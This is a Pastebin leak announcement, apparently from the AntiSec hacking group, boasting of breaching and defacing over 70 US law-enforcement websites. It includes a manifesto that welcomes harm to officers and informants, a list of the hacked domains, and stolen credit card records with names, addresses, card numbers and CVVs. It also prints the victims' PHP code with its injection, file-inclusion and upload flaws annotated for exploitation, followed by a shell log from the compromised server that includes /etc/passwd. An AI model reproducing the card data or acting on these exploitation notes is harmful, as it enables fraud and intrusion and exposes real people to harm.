Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- `..--.
- `:.#antisec#;:
- :antisec#anti;+.`
- :sec#antisec#a;/:
- ntisec#antisec#+a
- .ntisec#antisec;:
- `-` +#antisec#anti:s/
- /.:+:/+.`..` `;+;ec#antisec::+
- :.;;+`-./-:` .+:#antisec#anti-++`
- `-` -:.``; `:.+.sec#antisec#a: -;-
- `; -:::. `-:+..;/:ntisec#an.-` :+``+-
- `.+- `./;.- `-/++++:`.:-;tisec#anti++ -s;`/;//-
- `-:` .-:- /::+-` :/+;ec#ant;i;/.. ;s:.;:++.:
- `/ .:` `;:/` .+..+///:::/:. /:e;c#a:;/+-`
- `:+.. .. .:.;n+/++. `---...```` `tisec#an:/:++-
- -::-` `.--` -t:./;:ise./.`.. .:+.;;c#antisec#:.;;
- +- .::.` .;:.;antisec;.+;;+` .--:;..:.#;antisec;;/
- `.` `++-` ./;;#antisec#a;:nt;i+.` ` ;. `-;sec#an:.`
- .:. .;-` t+.isec#;a:;:;;nt;i+::.-`` ..:-` .. .;sec#a+:.
- --::...; ..;ntise+c;:-` :;.-`:++.+//:- `/ `;#ant;+:
- ./:::.: +::isec;#. `an.. .-/.; -tisec/
- `.+.::/``/+:#an:;. .ti+` `./;;:`;+ sec#.+`
- /anti:;..sec#; .an. `-+.;+::.-.. ti;+:`:;`
- /sec#antise/c `#a- ``-;..//+.+:.-. -ntis:::/;
- ec#antisec#:+ /a. ////+//./..+++..` `;nti./:`:`
- `sec#antisec#/ /;:+///...+:/.//;;;:././+- `;ant+/;`
- isec#antis;. `;ec#antisec#antisec#ant:.:;;. :/:-`
- isec#antis: -;ec#antisec#antisec#anti;.- .;/
- /sec#antise/ c#antisec#antisec#antis.:-` .
- /;;ec#an::. tise.`
- `+.c#..+` ;+-.;`
- `:/:
- "Alright Dirty, yall boys ready? Bout to turn drive-bys revolutionary"
- ////////////////////////////////////////////////////////////////////////////////
- ## #FREETOPIARY #FREEMERCEDES #FREEBRADLEYMANNING #SHOOTINNGSHERIFFSSATURDAY ###
- ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ##
- ////////////////////////////////////////////////////////////////////////////////
- _ _ __ .__
- __| || |__ _____ _____/ |_|__| ______ ____ ____ #anonymous
- \ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #antisec
- | || | / __ \| | \ | | |\___ \\ ___/\ \___ #lulzsec
- /_ ~~ _\ (____ /___| /__| |__/____ >\___ >\___ > #freetopiary
- |_||_| \/ \/ \/ \/ \/ #SSS
- ////////////////////////////////////////////////////////////////////////////////
- ANTISEC DELIVERS OVER 10GB OF PRIVATE POLICE EMAILS, TRAINING FILES, SNITCH INFO
- AND PERSONAL INFO IN RETALIATION FOR ANONYMOUS ARRESTS #ShootingSheriffsSaturday
- ////////////////////////////////////////////////////////////////////////////////
- "Missouri Sheriff's Association Executive Director Mick Covington tells KHQA
- that the most the hackers got from their organization were email addresses.
- Contrary to AntiSec's announcement, there were no critical details like names,
- social security numbers or other personal information details on their server
- that was hacked." (DOX AND EMAILS DROPPED)
- (http://www.connecttristates.com/news/story.aspx?id=646614)
- "Based upon past releases of information, the content of these releases are
- sometimes manipulated and edited in an attempt of embarrass or discredit
- government agencies and law enforcement. Also in their release, they threaten to
- publish the names of inmates and confidential informants. Informant and other
- sensitive data are not kept on the website, and we believe any information that
- would be released would be false in an attempt to hinder future investigations
- by law enforcement." - Sheriff John Montgomery (MORE DOX DROPPED)
- (http://www.baxterbulletin.com/article/20110801/NEWS01/110801001/BC-Sheriff-
- Website-hacked?odyssey=tab|topnews|text|FRONTPAGE)
- "President of the Missouri Sheriff's Association Steve Cox said he thinks the
- hackers claim to have more information than they really do. Cox said the group
- just wants glory and fame." (DOX AND SSN DROPPED)
- (http://www.komu.com/news/update-group-hacks-missouri-sheriff-s-association/)
- "Sheriff Joe Guy says, "We've not lost any information. There's no, we've not
- been hacked. I think that's been a fear. No sensitive information is on that
- website anyway." (DOX AND EMAILS DROPPED AGAIN)
- http://wdef.com/news/mcminn_county_sheriffs_department_website/08/2011
- ////////////////////////////////////////////////////////////////////////////////
- A week after we defaced and destroyed the websites of over 70 law enforcement
- agencies, we are releasing a massive amount of confidential information that is
- sure to embarass, discredit and incriminate police officers across the US. Over
- 10GB of information was leaked including hundreds of private email spools,
- password information, address and social security numbers, credit card numbers,
- snitch information, training files, and more. We hope that not only will
- dropping this info demonstrate the inherently corrupt nature of law enforcement
- using their own words, as well as result in possibly humiliation, firings, and
- possible charges against several officers, but that it will also disrupt and
- sabotage their ability to communicate and terrorize communities.
- We are doing this in solidarity with Topiary and the Anonymous PayPal LOIC
- defendants as well as all other political prisoners who are facing the gun of
- the crooked court system. We stand in support of all those who struggle against
- the injustices of the state and capitalism using whatever tactics are most
- effective, even if that means breaking their laws in order to expose their
- corruption. You may bust a few of us, but we greatly outnumber you, and you can
- never stop us from continuing to destroy your systems and leak your data.
- We have no sympathy for any of the officers or informants who may be endangered
- by the release of their personal information. For too long they have been using
- and abusing our personal information, spying on us, arresting us, beating us,
- and thinking that they can get away with oppressing us in secrecy. Well it's
- retribution time: we want them to experience just a taste of the kind of misery
- and suffering they inflict upon us on an everyday basis. Let this serve as a
- warning to would-be snitches and pigs that your leaders can no longer protect
- you: give up and turn on your masters now before it's too late.
- // A TALE OF TWO OWNINGS
- It took less than 24 hours to root BJM's server and copy all their data to our
- private servers. Soon after, their servers were taken down and a news article
- came out suggesting they received advance FBI "credible threat" notice of a
- "hacking plot". At this point it was too late for them because the stolen files
- were gonna get leaked regardless. However we were surprised and delighted to see
- that not only did they relaunch a few sites less than a week later, but that
- their "bigger, faster server that offers more security" carried over our
- backdoors from their original box. This time we were not going to hesitate to
- pull the trigger: in less than an hour we rooted their new server and defaced
- all 70+ domains while their root user was still logged in and active.
- We lol'd as we watched the news reports come in, quoting various Sheriffs who
- denied that they were ever hacked, that any personal information was stolen,
- that they did not store snitch info on their servers. Many lulz have been had as
- we taunted the sheriffs by responding to their denials by tweeting teasers
- exposing their SSNs, passwords, addresses, and private emails. We also took the
- liberty to backdoor their online store and capture a few credit card numbers,
- which were used to make involuntary donations to the ACLU, the EFF, the Bradley
- Manning Support Network, and more. Despite active FBI investigations and their
- additional security measures, they could not stop us from owning their servers,
- stealing their identities, and dropping all their data. Two weeks later only a
- few of the sites are up with limited functionality as we scared them into
- removing any dynamic PHP scripts, forcing them to use static HTML content.
- A recent DHS bulletin has called us "script kiddies" that lack "any capability
- to inflict damage to critical infrastructure" yet we continue to get in and out
- of any system we please, destroying and dropping dox on the mightiest of
- government systems that are supposed to be protecting their sick nightmare of
- "law and order". GIVE UP. You are losing the cyberwar, and the attacks against
- the governments, militaries, and corporations of the world will continue to
- escalate.
- Hackers, join us to make 2011 the year of leaks and revolutions.
- ////////////////////////////////////////////////////////////////////////////////
- [*] ORIGINAL DEFACEMENT: http://zone-h.org/mirror/id/14515221)
- [*] BROWSE THE LEAK: http://vv7pabmmyr2vnflf.onion/ (ON TOR)
- http://vv7pabmmyr2vnflf.tor2web.com/ (NOT TOR)
- [*] DONATE BITCOINS: 18NHixaoQekQJ3y52aBGJJwgBWX9X3myYR
- The booty contains:
- [*] Over 300 mail accounts from 56 law enforcement domains
- [*] Missouri Sheriff account dump (mosheriffs.com)
- 7000+ usernames, passwords, home addresses, phones and SSNs
- [*] Online Police Training Academy files
- PDFs, videos, HTML files
- [*] "Report a Crime" snitch list compilation (60+ entries)
- [*] Plesk plaintext server passwords (ftp/ssh, email, cpanel, protected dirs)
- ////////////////////////////////////////////////////////////////////////////////
- Over 70 US law enforcement institutions were attacked including:
- 20jdpa.com, adamscosheriff.org, admin.mostwantedwebsites.net,
- alabamasheriffs.com, arkansassheriffsassociation.com,
- bakercountysheriffoffice.org, barrycountysheriff.com, baxtercountysheriff.com,
- baxtercountysherifffoundation.org, boonecountyar.com, boonesheriff.com,
- cameronso.org, capecountysheriff.org, cherokeecountyalsheriff.com,
- cityofgassville.org, cityofwynne.com, cleburnecountysheriff.com,
- coahomacountysheriff.com, crosscountyar.org, crosscountysheriff.org,
- drewcountysheriff.com, faoret.com, floydcountysheriff.org, fultoncountyso.org,
- georgecountymssheriff.com, grantcountyar.com, grantcountysheriff-collector.com,
- hodgemansheriff.us, hotspringcountysheriff.com, howardcountysheriffar.com,
- izardcountyar.org, izardcountysheriff.org, izardhometownhealth.com,
- jacksonsheriff.org, jeffersoncountykssheriff.com, jeffersoncountyms.gov,
- jocomosheriff.org, johnsoncosheriff.com, jonesso.com, kansassheriffs.org,
- kempercountysheriff.com, knoxcountysheriffil.com, lawrencecosheriff.com,
- lcsdmo.com, marioncountysheriffar.com, marionsoal.com, mcminncountysheriff.com,
- meriwethercountysheriff.org, monroecountysheriffar.com, mosheriffs.com,
- mostwantedgovernmentwebsites.com, mostwantedwebsites.net,
- newtoncountysheriff.org, perrycountysheriffar.org, plymouthcountysheriff.com,
- poalac.org, polkcountymosheriff.org, prairiecountysheriff.org,
- prattcountysheriff.com, prentisscountymssheriff.com, randolphcountysheriff.org,
- rcpi-ca.org, scsosheriff.org, sebastiancountysheriff.com, sgcso.com,
- sharpcountysheriff.com, sheriffcomanche.com, stfranciscountyar.org,
- stfranciscountysheriff.org, stonecountymosheriff.com, stonecountysheriff.com,
- talladegasheriff.org, tatecountysheriff.com, tishomingocountysheriff.com,
- tunicamssheriff.com, vbcso.com, woodsonsheriff.com
- ////////////////////////////////////////////////////////////////////////////////
- Stolen Credit Card information from mosheriffs.com online store:
- Jeremy,Searcy,jeremy@pfimo.com,417-887-3626,MasterCard,5191000109460087,2,2014,
- 102,3526 W Nichols,,Springfield,MO,65803
- Robert,Zoellr,Cabot46@aol.com,954-529-0840,Visa,4388540016715210,11,2012,501,401
- E Las Olas Blvd ,Suite 130-143,FT Lauderdale ,FL,33301,571 Elbow Cay
- Drive,Camden,Osage Beach,MO,65065
- Jeffrey,Thomas,chymoda3@aol.com,573-529-1836,MasterCard,5109820390825461,2,2013,
- 768,417 North Locust Street,,Richland,MO,65556
- nathan,vails,dalebud2004@sbcglobal.net,573-225-3010,Visa,4607174190144503,7,2013
- ,237,35984 Hwy 25,,malden,MO,63863
- David,Yingling,dyingling@sbcglobal.net,573-335-5286,MasterCard,5200011252796077,
- 5,2014,739,617 Peironnet Drive,,Cape Girardeau,MO,63701
- Mark,Bell,Mark@jailbaitcyclesandrods.com,417 830
- 3410,MasterCard,5441840150712888,5,2012,094,8117 West Farm Road
- 168,,Republic,MO,65738
- ////////////////////////////////////////////////////////////////////////////////
- For the Blackhat & DEFCON conferences, we figure yall should hear it straight
- from some real black hats. It's time to bust out the old school hacklog and mock
- how vulnerable and insecure our enemies in blue really are.
- ////////////////////////////////////////////////////////////////////////////////
- ////////////////////////////////////////////////////////////////////////////////
- // CONNECT.PHP
- // SAFE_QUERY()... WAY TO MAKE SQL INJECTIONS WORSE BY NOT VALIDATING INPUT ...
- // BUT INSTEAD PASSING RAW INPUT TO SHELL_EXEC() ALLOWING COMMAND EXECUTION !!!
- ////////////////////////////////////////////////////////////////////////////////
- <?
- $i = 0;
- $path = '';
- while(!is_file($path."admin/config/classes/dymin_main.php")){
- $path .= '../';
- $i++;
- if($i>10){
- $path = '';
- break;
- }
- }
- include($path."admin/config/dymin_config.php");
- function safe_query($query){
- if(strpos(getcwd(),'admin')){
- shell_exec("echo '".date("Y-m-d H:i:s")."|".$query."' >>
- /var/sql_logs/".str_replace("www.","",$_SERVER['HTTP_HOST'].""));
- }
- $database = DATABASE;
- $username = DATABASE_USER;
- $password = DATABASE_PASS;
- $destination = DATABASE_HOST;
- mysql_connect($destination, $username, $password) or die("<br>Unable to
- connect to database: <br>". mysql_error());
- mysql_select_db($database) or die ("<br> Unable to select
- database[$database]: <br>" . mysql_error());
- $result = mysql_query($query);
- return $result;
- }
- ?>
- ////////////////////////////////////////////////////////////////////////////////
- // VERIFY_LOGIN.PHP
- // ITS BEEN A HOT MINUTE SINCE I'VE SEEN ' OR 'a'='a SQL INJECTIONS WORK
- // BUT BJM NEVER FAILS TO DELIVER THE MOST OBVIOUS OF VULNERABILITIES
- ////////////////////////////////////////////////////////////////////////////////
- <?php
- session_start();
- $username = $_GET['username'];
- $password = $_GET['password'];
- include "../config/connect.php";
- sleep(2);
- $query = "select * from dymin_user where username = '$username' and password =
- '$password'";
- $result = safe_query($query);
- $num = mysql_num_rows($result);
- if($num == ''){
- echo "<img src=\"images/login_deny.gif\">";
- }else{
- $id = mysql_result($result,0,'id');
- $level = mysql_result($result,0,'level');
- $_SESSION['user_id'] = $id;
- $_SESSION['username'] = $username;
- $_SESSION['password'] = $password;
- $_SESSION['level'] = $level;
- }
- ?>
- ////////////////////////////////////////////////////////////////////////////////
- // RENAME_FILE.PHP
- // PASSING RAW USER-SUPPLIED INPUT TO RENAME AND INCLUDE FUNCTIONS ...
- // TWO VULNERABILITIES FOR THE PRICE OF ONE!!
- ////////////////////////////////////////////////////////////////////////////////
- <?
- error_reporting(E_ALL);
- ini_set('display_errors', '1');
- include "../../admin/config/connect.php";
- $filename = $_POST['name'];
- $type = $_POST['type'];
- $uploads_dir_path_with_date = '../../uploads/'.date("Ymd").'/';
- $uploads_dir_path = '../../uploads/'.date("Ymd").'/';
- $uploads_dir_path_no_date = '../../uploads/';
- if(!is_file($uploads_dir_path_no_date.'log.txt')){
- $fh = fopen("$uploads_dir_path_no_date"."log.txt",'w');
- shell_exec("chmod 777 $uploads_dir_path_with_date"."log.txt");
- fclose($fh);
- }
- if(!is_dir($uploads_dir_path_with_date)){
- mkdir($uploads_dir_path_with_date,'0777');
- shell_exec("chmod 777 $uploads_dir_path_with_date");
- }
- $id = $_GET['id'];
- $new_name = md5(microtime().$filename.mt_rand(10000, 32000));
- rename("$uploads_dir_path_no_date$filename","$uploads_dir_path_with_date$
- new_name$type");
- //write file upload log
- $fh = fopen("$uploads_dir_path_no_date"."log.txt",'a');
- $log_info = 'DATE: '.date("m-d-Y His")."\t";
- $log_info .= 'HTTP_HOST: '.$_SERVER['HTTP_HOST']."\t";
- $log_info .= 'REMOTE_ADDR: '.$_SERVER['REMOTE_ADDR']."\t";
- $log_info .= 'SCRIPT_FILENAME: '.$_SERVER['SCRIPT_FILENAME']."\t";
- $log_info .= 'OLD_FILENAME: '.$filename."\t";
- $log_info .= 'NEW_FILENAME: '.$new_name."\t\n";
- fwrite($fh,$log_info);
- fclose($fh);
- unset($fh,$log_info);
- $file_to_include = $_GET['filename'];
- include "$file_to_include";
- ?>
- ////////////////////////////////////////////////////////////////////////////////
- // UPLOADIFY.PHP
- // WAY TO GO, COMMENTING OUT THE FILE EXTENSION VALIDATING CODE
- ////////////////////////////////////////////////////////////////////////////////
- <?php
- if (!empty($_FILES)) {
- $tempFile = $_FILES['Filedata']['tmp_name'];
- $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
- $targetFile = str_replace('//','/',$targetPath) .
- $_FILES['Filedata']['name'];
- // $fileTypes = str_replace('*.','',$_REQUEST['fileext']);
- // $fileTypes = str_replace(';','|',$fileTypes);
- // $typesArray = split('\|',$fileTypes);
- // $fileParts = pathinfo($_FILES['Filedata']['name']);
- // if (in_array($fileParts['extension'],$typesArray)) {
- // Uncomment the following line if you want to make the directory if it
- doesn't exist
- // mkdir(str_replace('//','/',$targetPath), 0755, true);
- move_uploaded_file($tempFile,$targetFile);
- echo "1";
- // } else {
- // echo 'Invalid file type.';
- // }
- }
- ?>
- ////////////////////////////////////////////////////////////////////////////////
- // SHOW_IMAGE_DOWNLOAD.PHP
- // HEY LETS TAKE RAW USER INPUT AND PASS IT TO READFILE() ...
- // AT LEAST THEY HAD THE COURTESY OF VERIFYING IS_FILE() FOR US!!!
- ////////////////////////////////////////////////////////////////////////////////
- <? include "config/header.php"; ?>
- <?php
- $filename = $_GET['filename'];
- if(is_file($filename)) {
- header("Pragma: public");
- header("Expires: 0");
- header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
- header("Content-Type: application/force-download");
- header("Content-Type: application/octet-stream");
- header("Content-Type: application/download");
- header("Content-Disposition: attachment; filename=".basename($filename).";");
- header("Content-Transfer-Encoding: binary");
- header("Content-Length: ".filesize($filename));
- readfile("$filename");
- exit();
- }
- ?>
- ////////////////////////////////////////////////////////////////////////////////
- // UPLOAD_SCANNER.SH
- // UH OH... THEY ARE CLOSING IN ON OUR C99 SHELL!!! PLEASE...
- ////////////////////////////////////////////////////////////////////////////////
- #!/bin/bash
- #
- # Scan for PHP in upload folders
- #
- MAILTO="-c galexander@bjmweb.com -c markm@bjmweb.com -c bnewman@bjmweb.com root"
- EXCLUDES="-e watermark_wanted_photo.php -e checkimages.php -e
- watermark_recalled_photo.php"
- lineify (){
- for i in $*
- do
- echo $i
- done
- }
- # testing
- #EXCLUDES="numnum"
- #MAILTO="jwiegand@bjmweb.com"
- #
- UHOH=$(/usr/bin/find /var/www/vhosts/*/httpdocs/uploads/*.php | \
- grep -v $EXCLUDES)
- if [ "${UHOH}xx" != "xx" ]
- then
- lineify $UHOH | mail -s "Go Daddy - Upload Scanner" $MAILTO
- ////////////////////////////////////////////////////////////////////////////////
- // ENOUGH TALK... TIME TO RIDE ON THESE PIG MOTHAFUCKAS !!! BRING ON THE HACKLOG
- ////////////////////////////////////////////////////////////////////////////////
- $ ls -al /var/www/vhosts/
- total 332
- drwxr-xr-x 83 root root 4096 Jul 20 11:33 .
- drwxr-xr-x 9 root root 4096 Aug 30 2010 ..
- drwxr-xr-x 3 root root 4096 Dec 21 2009 .skel
- drwxr-xr-x 13 root root 4096 Apr 7 2010 20jdpa.com
- drwxr-xr-x 14 root root 4096 Jun 22 10:59 adamscosheriff.org
- drwxr-xr-x 13 root root 4096 Nov 30 2010 admin.mostwantedwebsites.net
- drwxr-xr-x 13 root root 4096 Nov 30 2010 alabamasheriffs.com
- drwxr-xr-x 14 root root 4096 May 3 09:44 arkansassheriffsassociation.com
- drwxr-xr-x 13 root root 4096 Nov 30 2010 bakercountysheriffoffice.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 barrycountysheriff.com
- drwxr-xr-x 14 root root 4096 Apr 7 2010 baxtercountysheriff.com
- drwxr-xr-x 14 root root 4096 Jun 10 09:59 baxtercountysherifffoundation.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 boonecountyar.com
- drwxr-xr-x 14 root root 4096 May 10 2010 boonesheriff.com
- drwxr-xr-x 13 root root 4096 Nov 30 2010 cameronso.org
- drwxr-xr-x 13 root root 4096 Nov 30 2010 capecountysheriff.org
- drwxr-xr-x 14 root root 4096 Apr 7 2010 cherokeecountyalsheriff.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 cherokeecountykssheriff.com
- drwxr-xr-x 9 root root 4096 Dec 21 2009 chroot
- drwxr-xr-x 14 root root 4096 May 19 11:36 cityofgassville.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 cityofwynne.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 cleburnecountysheriff.com
- drwxr-xr-x 13 root root 4096 May 26 2010 coahomacountysheriff.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 crosscountyar.org
- drwxr-xr-x 14 root root 4096 Apr 7 2010 crosscountysheriff.org
- drwxr-xr-x 5 root root 4096 Oct 16 2009 default
- drwxr-xr-x 13 root root 4096 Apr 7 2010 drewcountysheriff.com
- drwxr-xr-x 13 root root 4096 May 26 2010 faoret.com
- drwxr-xr-x 13 root root 4096 Nov 30 2010 floydcountysheriff.org
- drwxr-xr-x 14 root root 4096 Mar 24 10:11 fultoncountyso.org
- drwxr-xr-x 13 root root 4096 Nov 30 2010 georgecountymssheriff.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 grantcountyar.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 grantcountysheriff-collector.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 hodgemansheriff.us
- drwxr-xr-x 13 root root 4096 Apr 7 2010 hotspringcountysheriff.com
- drwxr-xr-x 14 root root 4096 Oct 19 2010 howardcountysheriffar.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 izardcountyar.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 izardcountysheriff.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 izardhometownhealth.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 jacksonsheriff.org
- drwxr-xr-x 14 root root 4096 Jun 30 2010 jeffersoncountykssheriff.com
- drwxr-xr-x 14 root root 4096 Feb 4 16:03 jeffersoncountyms.gov
- drwxr-xr-x 14 root root 4096 Apr 7 2010 jocomosheriff.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 johnsoncosheriff.com
- drwxr-xr-x 14 root root 4096 Jun 11 2010 jonesso.com
- drwxr-xr-x 14 root root 4096 Jun 24 16:36 kansassheriffs.org
- drwxr-xr-x 13 root root 4096 May 26 2010 kempercountysheriff.com
- drwxr-xr-x 13 root root 4096 Nov 30 2010 knoxcountysheriffil.com
- drwxr-xr-x 14 root root 4096 Apr 7 2010 lawrencecosheriff.com
- drwxr-xr-x 15 root root 4096 Jun 8 08:55 lcsdmo.com
- drwxr-xr-x 14 root root 4096 Jan 26 09:40 marioncountysheriffar.com
- drwxr-xr-x 13 root root 4096 Nov 30 2010 marionsoal.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 mcminncountysheriff.com
- drwxr-xr-x 13 root root 4096 Nov 30 2010 meriwethercountysheriff.org
- drwxr-xr-x 13 root root 4096 May 26 2010 monroecountysheriffar.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 mosheriffs.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 mostwantedgovernmentwebsites.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 mostwantedwebsites.net
- drwxr-xr-x 13 root root 4096 Apr 7 2010 newtoncountysheriff.org
- drwxr-xr-x 13 root root 4096 Nov 30 2010 perrycountysheriffar.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 plymouthcountysheriff.com
- drwxr-xr-x 14 root root 4096 Apr 21 08:36 poalac.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 polkcountymosheriff.org
- drwxr-xr-x 14 root root 4096 Dec 9 2010 prairiecountysheriff.org
- drwxr-xr-x 15 root root 4096 Jun 1 2010 prattcountysheriff.com
- drwxr-xr-x 14 root root 4096 Jun 10 13:49 prentisscountymssheriff.com
- drwxr-xr-x 13 root root 4096 Nov 30 2010 randolphcountysheriff.org
- drwxr-xr-x 14 root root 4096 May 6 09:25 rcpi-ca.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 scsosheriff.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 sebastiancountysheriff.com
- drwxr-xr-x 13 root root 4096 Nov 30 2010 sgcso.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 sharpcountysheriff.com
- drwxr-xr-x 14 root root 4096 Mar 23 11:41 sheriffcomanche.com
- drwxr-xr-x 14 root root 4096 Jun 6 13:54 stfranciscountyar.org
- drwxr-xr-x 14 root root 4096 Nov 30 2010 stfranciscountysheriff.org
- drwxr-xr-x 14 root root 4096 Nov 30 2010 stonecountymosheriff.com
- drwxr-xr-x 14 root root 4096 Oct 27 2010 stonecountysheriff.com
- drwxr-xr-x 14 root root 4096 Jun 9 11:51 talladegasheriff.org
- drwxr-xr-x 13 root root 4096 Apr 7 2010 tatecountysheriff.com
- drwxr-xr-x 13 root root 4096 Nov 30 2010 tishomingocountysheriff.com
- drwxr-xr-x 13 root root 4096 Apr 7 2010 tunicamssheriff.com
- drwxr-xr-x 14 root root 4096 Apr 7 2010 vbcso.com
- drwxr-xr-x 13 root root 4096 May 26 2010 woodsonsheriff.com
- // DAMN THATS A LOT OF DOMAINS... TOO BAD ZONE-H MASS DEFACEMENT NOTIFICATION
- // FORM ONLY ALLOWS YOU TO SUBMIT 10 PER REQUEST... GONNA TAKE FOREVER
- $ cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- news:x:9:13:news:/etc/news:
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- rpm:x:37:37::/var/lib/rpm:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
- nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
- rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
- nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- pcap:x:77:77::/var/arpwatch:/sbin/nologin
- haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
- webdept:x:500:500::/home/webdept:/bin/bash
- avahi:x:70:70:Avahi daemon:/:/sbin/nologin
- avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
- named:x:25:25:Named:/var/named:/sbin/nologin
- xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- distcache:x:94:94:Distcache:/:/sbin/nologin
- mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
- ntp:x:38:38::/etc/ntp:/sbin/nologin
- sw-cp-server:x:501:501::/:/bin/true
- psaadm:x:502:502:Plesk user:/usr/local/psa/admin:/sbin/nologin
- popuser:x:110:31:POP3 service user:/var/qmail/popuser:/sbin/nologin
- mhandlers-user:x:30:31:mail handlers user:/:/sbin/nologin
- webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
- psaftp:x:503:504:anonftp psa user:/:/sbin/nologin
- alias:x:2021:2020:Qmail User:/var/qmail/alias:/sbin/nologin
- qmaild:x:2020:2020:Qmail User:/var/qmail/:/sbin/nologin
- qmaill:x:2022:2020:Qmail User:/var/qmail/:/sbin/nologin
- qmailp:x:2023:2020:Qmail User:/var/qmail/:/sbin/nologin
- qmailq:x:2520:2520:Qmail User:/var/qmail/:/sbin/nologin
- qmailr:x:2521:2520:Qmail User:/var/qmail/:/sbin/nologin
- qmails:x:2522:2520:Qmail User:/var/qmail/:/sbin/nologin
- postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
- drweb:x:101:2523:DrWeb system account:/var/drweb:/bin/false
- jdpa:x:10001:2522::/var/www/vhosts/20jdpa.com:/bin/false
- barms:x:10002:2522::/var/www/vhosts/barrycountysheriff.com:/bin/false
- bcsd:x:10003:2522::/var/www/vhosts/baxtercountysheriff.com:/bin/bash
- bjm:x:10004:2522::/var/www/vhosts/mostwantedwebsites.net:/bin/false
- demo:x:10005:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/demo:/bin/
- false
- dymin:x:10006:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/dymin:/bin
- /false
- dcsd:x:10007:2522::/var/www/vhosts/drewcountysheriff.com:/bin/false
- bocg:x:10008:2522::/var/www/vhosts/boonecountyar.com:/bin/false
- crcsd:x:10009:2522::/var/www/vhosts/crosscountysheriff.org:/bin/false
- bocs:x:10010:2522::/var/www/vhosts/boonesheriff.com:/bin/false
- izhth:x:10011:2522::/var/www/vhosts/izardhometownhealth.com:/bin/false
- mcmtn:x:10012:2522::/var/www/vhosts/mcminncountysheriff.com:/bin/false
- ccsal:x:10013:2522::/var/www/vhosts/cherokeecountyalsheriff.com:/bin/false
- tunms:x:10014:2522::/var/www/vhosts/tunicamssheriff.com:/bin/false
- ccsd:x:10015:2522::/var/www/vhosts/cleburnecountysheriff.com:/bin/false
- ciwy:x:10016:2522::/var/www/vhosts/cityofwynne.com:/bin/false
- ncsd:x:10017:2522::/var/www/vhosts/newtoncountysheriff.org:/bin/false
- icsd:x:10019:2522::/var/www/vhosts/izardcountysheriff.org:/bin/false
- shsd:x:10020:2522::/var/www/vhosts/sharpcountysheriff.com:/bin/false
- polms:x:10021:2522::/var/www/vhosts/polkcountymosheriff.org:/bin/false
- grcg:x:10023:2522::/var/www/vhosts/grantcountyar.com:/bin/false
- lawmo:x:10024:2522::/var/www/vhosts/lawrencecosheriff.com:/bin/false
- johms:x:10025:2522::/var/www/vhosts/jocomosheriff.org:/bin/false
- sacsd:x:10026:2522::/var/www/vhosts/scsosheriff.org:/bin/false
- jcsd:x:10027:2522::/var/www/vhosts/jacksonsheriff.org:/bin/false
- gcsd:x:10028:2522::/var/www/vhosts/grantcountysheriff-collector.com:/bin/false
- izcg:x:10029:2522::/var/www/vhosts/izardcountyar.org:/bin/false
- jocsd:x:10030:2522::/var/www/vhosts/johnsoncosheriff.com:/bin/false
- scsd:x:10031:2522::/var/www/vhosts/sebastiancountysheriff.com:/bin/false
